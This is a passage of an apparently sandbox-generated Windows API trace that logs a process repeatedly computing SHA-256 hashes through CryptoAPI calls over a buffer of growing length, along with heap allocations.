Size=0x20) returned 0x32e882f0 [0187.753] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32e882f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e882f0, pdwDataLen=0xce51c) returned 1 [0187.753] CryptDestroyHash (hHash=0x3396f820) returned 1 [0187.753] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0187.753] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0187.753] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.753] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0187.753] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.753] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88350 [0187.753] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e88350, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88350, pdwDataLen=0xce51c) returned 1 [0187.753] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.753] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0187.754] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0187.754] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.754] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0187.754] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.754] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e885c0 [0187.754] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e885c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e885c0, pdwDataLen=0xce51c) returned 1 [0187.754] CryptDestroyHash (hHash=0x3396f890) returned 1 [0187.754] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0187.754] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338237d0) returned 1 [0187.755] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.755] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0187.755] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.755] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88440 [0187.755] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e88440, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88440, pdwDataLen=0xce51c) returned 1 [0187.755] CryptDestroyHash (hHash=0x3396f120) returned 1 [0187.755] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0187.755] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338226d0) returned 1 [0187.755] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.755] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0187.755] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.756] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88470 [0187.756] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e88470, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88470, pdwDataLen=0xce51c) returned 1 [0187.756] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.756] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0187.756] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0187.756] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.756] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0187.756] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.756] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e884d0 [0187.756] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e884d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e884d0, pdwDataLen=0xce51c) returned 1 [0187.756] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.756] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0187.756] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823bd0) returned 1 [0187.757] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.757] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0187.757] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.757] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e885f0 [0187.757] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e885f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e885f0, pdwDataLen=0xce51c) returned 1 [0187.757] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.757] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0187.757] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338237d0) returned 1 [0187.758] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.758] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0187.758] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.758] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88bf0 [0187.758] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e88bf0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88bf0, pdwDataLen=0xce51c) returned 1 [0187.758] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0187.758] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0187.758] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0187.758] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.758] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0187.759] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.759] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88980 [0187.759] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e88980, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88980, pdwDataLen=0xce51c) returned 1 [0187.759] CryptDestroyHash (hHash=0x3396f120) returned 1 [0187.759] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0187.759] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.759] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.759] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0187.759] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.759] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88c50 [0187.759] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e88c50, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88c50, pdwDataLen=0xce51c) returned 1 [0187.759] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.759] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.759] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.760] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.760] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0187.760] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.760] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88ce0 [0187.760] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e88ce0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88ce0, pdwDataLen=0xce51c) returned 1 [0187.760] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0187.760] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.760] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0187.761] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.761] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0187.761] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.761] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89580 [0187.761] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e89580, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e89580, pdwDataLen=0xce51c) returned 1 [0187.761] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0187.773] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0187.773] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0187.774] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.774] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0187.774] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.774] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88f50 [0187.774] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x2, pbData=0x32e88f50, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88f50, pdwDataLen=0xce51c) returned 1 [0187.774] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.774] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0187.774] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.775] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.775] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0187.775] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.775] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88f80 [0187.775] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32e88f80, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88f80, pdwDataLen=0xce51c) returned 1 [0187.775] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.775] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.775] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0187.775] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.776] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0187.776] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.776] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88fb0 [0187.776] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e88fb0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88fb0, pdwDataLen=0xce51c) returned 1 [0187.776] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.776] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0187.776] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0187.776] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.776] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0187.776] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.776] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88ef0 [0187.777] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0187.777] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0187.777] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0187.777] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.777] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0187.777] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e896a0 [0187.777] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0187.778] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0187.778] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822cd0) returned 1 [0187.778] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.778] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0187.778] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89790 [0187.778] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0187.778] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0187.778] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338226d0) returned 1 [0187.780] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.780] CryptHashData (hHash=0x3396f820, pbData=0x32348160, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0187.780] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89a30 [0187.780] CryptDestroyHash (hHash=0x3396f820) returned 1 [0187.780] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0187.780] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32348160 | out: hHeap=0x2150000) returned 1 [0187.780] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32348160 [0187.780] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0187.781] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.781] CryptHashData (hHash=0x3396f270, pbData=0x32348160, dwDataLen=0x20, dwFlags=0x0) returned 1 [0187.781] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e896d0 [0187.781] CryptDestroyHash (hHash=0x3396f270) returned 1 [0187.781] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0187.781] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0187.790] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.790] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x40, dwFlags=0x0) returned 1 [0187.790] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e893a0 [0187.790] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0187.790] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0187.790] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0187.791] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.791] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x60, dwFlags=0x0) returned 1 [0187.791] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89820 [0187.791] CryptDestroyHash (hHash=0x3396f900) returned 1 [0187.791] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0187.791] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0187.791] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.791] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0x80, dwFlags=0x0) returned 1 [0187.791] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89850 [0187.791] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0187.791] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0187.791] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0187.792] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.792] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0187.792] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e891c0 [0187.792] CryptDestroyHash (hHash=0x3396f350) returned 1 [0187.792] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0187.792] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.793] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.793] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0187.793] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89700 [0187.793] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.793] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.793] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.793] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.793] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0187.793] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89880 [0187.793] CryptDestroyHash (hHash=0x3396f120) returned 1 [0187.793] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.793] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.794] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.794] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0x100, dwFlags=0x0) returned 1 [0187.794] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89490 [0187.794] CryptDestroyHash (hHash=0x3396f190) returned 1 [0187.794] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.794] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0187.795] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.795] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x120, dwFlags=0x0) returned 1 [0187.795] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e898b0 [0187.795] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.795] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0187.795] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.795] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.795] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x140, dwFlags=0x0) returned 1 [0187.795] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e893d0 [0187.795] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.795] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.795] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ad0) returned 1 [0187.796] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.796] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0x160, dwFlags=0x0) returned 1 [0187.796] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e898e0 [0187.796] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.796] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0187.796] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0187.797] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.797] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x180, dwFlags=0x0) returned 1 [0187.797] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89280 [0187.797] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0187.797] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0187.797] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0187.798] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.798] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0187.798] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e89400 [0187.798] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0187.798] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0187.798] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.798] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 